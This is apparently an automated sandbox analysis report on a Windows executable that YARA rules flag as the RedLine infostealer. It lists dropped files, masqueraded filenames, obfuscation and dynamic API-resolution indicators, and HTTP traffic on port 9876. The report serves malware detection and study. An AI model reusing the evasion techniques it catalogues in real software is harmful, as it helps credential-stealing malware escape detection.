Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_024E1023 0_2_024E1023
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_024E1030 0_2_024E1030
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_05A37018 0_2_05A37018
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_05A30007 0_2_05A30007
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_05A30040 0_2_05A30040
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_05A37008 0_2_05A37008
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_05AAD8F4 0_2_05AAD8F4
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_06AD3EE0 0_2_06AD3EE0
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_06AD3ED0 0_2_06AD3ED0
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_06AD6744 0_2_06AD6744
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_06AD7C90 0_2_06AD7C90
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_0A301040 0_2_0A301040
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_0A30F6C0 0_2_0A30F6C0
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_0A302CB8 0_2_0A302CB8
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_0A301D45 0_2_0A301D45
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_0A3067E8 0_2_0A3067E8
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_0A3067D9 0_2_0A3067D9
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_0B33839F 0_2_0B33839F
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_0B337720 0_2_0B337720
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_0B332790 0_2_0B332790
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_0B33B480 0_2_0B33B480
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_0B33B480 0_2_0B33B480
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_0B337720 0_2_0B337720
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_0BB82CD0 0_2_0BB82CD0
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: String function: 0040E1D8 appears 44 times
Sample file is different than original file name gathered from version info
Source: BaGkRDSifo.exe, 00000000.00000003.1222145293.0000000000972000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSTHealthClient.exe> vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_.dll4 vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003218000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclrjit.dllT vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003218000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003218000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameSTHealthClient.exe> vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilename_.dll4 vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000003.1222105370.000000000096D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSTHealthClient.exe> vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.00000000036A6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSTHealthUpdate.exe> vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSTHealthClient.exe> vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_.dll4 vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003657000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemscorlib.dllT vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003657000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003657000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003657000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSystem.dllT vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003657000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSystem.Drawing.dllT vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003657000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSystem.Configuration.dllT vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003657000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSystem.Core.dllT vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003657000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSystem.Xml.dllT vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003657000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000003.1222174993.000000000098A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameSTHealthClient.exe> vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000003.1222214639.0000000000995000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSTHealthClient.exe> vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename_.dll4 vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe Binary or memory string: OriginalFilenameSTHealthClient.exe> vs BaGkRDSifo.exe
Uses 32bit PE files
Source: BaGkRDSifo.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Yara signature match
Source: BaGkRDSifo.exe, type: SAMPLE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.0.BaGkRDSifo.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.BaGkRDSifo.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: C:\Users\user\Desktop\STHealthUpdate.exe, type: DROPPED Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.BaGkRDSifo.exe.2aa1f60.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.BaGkRDSifo.exe.2aa1f60.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.BaGkRDSifo.exe.2aa1f60.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.BaGkRDSifo.exe.2aa1f60.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.BaGkRDSifo.exe.5734f52.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.BaGkRDSifo.exe.5734f52.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.BaGkRDSifo.exe.5734f52.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.BaGkRDSifo.exe.5734f52.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal80.troj.evad.winEXE@1/2@0/1
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 0_2_004019F0
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 0_2_004019F0
Source: C:\Users\user\Desktop\BaGkRDSifo.exe File created: C:\Users\user\Desktop\Update Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Mutant created: NULL
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Mutant created: \Sessions\1\BaseNamedObjects\STHealthClient
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Command line argument: 08A 0_2_00413780
Source: BaGkRDSifo.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: BaGkRDSifo.exe Virustotal: Detection: 28%
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: mscorjit.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\BaGkRDSifo.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: BaGkRDSifo.exe Static file information: File size 3972096 > 1048576
Source: BaGkRDSifo.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x3a7c00
Source: BaGkRDSifo.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: System.Windows.Forms.pdb source: BaGkRDSifo.exe, 00000000.00000002.2478418643.0000000000968000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: STHealthClient.pdb source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: BaGkRDSifo.exe, 00000000.00000002.2478418643.0000000000968000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.pdbt source: BaGkRDSifo.exe, 00000000.00000002.2478418643.0000000000968000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: _.pdb source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: STHealthClient.pdbx]D source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: BaGkRDSifo.exe, 00000000.00000002.2478418643.0000000000968000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: 0.2.BaGkRDSifo.exe.2aa1f60.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs .Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.DdMA3xYEPP0GJ(16777540)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.DdMA3xYEPP0GJ(16777288)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.DdMA3xYEPP0GJ(16777263))})
Source: 0.3.BaGkRDSifo.exe.5734f52.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs .Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.DdMA3xYEPP0GJ(16777540)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.DdMA3xYEPP0GJ(16777288)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.DdMA3xYEPP0GJ(16777263))})
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 0_2_004019F0
PE file contains an invalid checksum
Source: BaGkRDSifo.exe Static PE information: real checksum: 0x23bfb should be: 0x3cd867
Source: STHealthUpdate.exe.0.dr Static PE information: real checksum: 0x23bfb should be: 0x3eb3c
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_0040E21D push ecx; ret 0_2_0040E230
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_06ACEAE3 pushfd ; retf 0_2_06ACEAE9
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_06ACEA58 push eax; retf 0_2_06ACEA59
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_0A308708 pushad ; retf 0_2_0A308709
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_0A300C00 push esp; retn 0004h 0_2_0A300C1C
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_0B333398 pushad ; iretd 0_2_0B3333A5
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_0B332B9D pushad ; iretd 0_2_0B332B9E
Source: 0.2.BaGkRDSifo.exe.2aa1f60.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs High entropy of concatenated method names: 'D4r4O0AxSI', 'OStA3xMYKIHVl', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: 0.2.BaGkRDSifo.exe.2aa1f60.1.raw.unpack, R2mIapWar4cwoqqx6Q.cs High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
Source: 0.3.BaGkRDSifo.exe.5734f52.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs High entropy of concatenated method names: 'D4r4O0AxSI', 'OStA3xMYKIHVl', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: 0.3.BaGkRDSifo.exe.5734f52.0.raw.unpack, R2mIapWar4cwoqqx6Q.cs High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
Drops PE files
Source: C:\Users\user\Desktop\BaGkRDSifo.exe File created: C:\Users\user\Desktop\STHealthUpdate.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 9876
Source: unknown Network traffic detected: HTTP traffic on port 9876 -> 49701
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 9876
Source: unknown Network traffic detected: HTTP traffic on port 9876 -> 49701
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
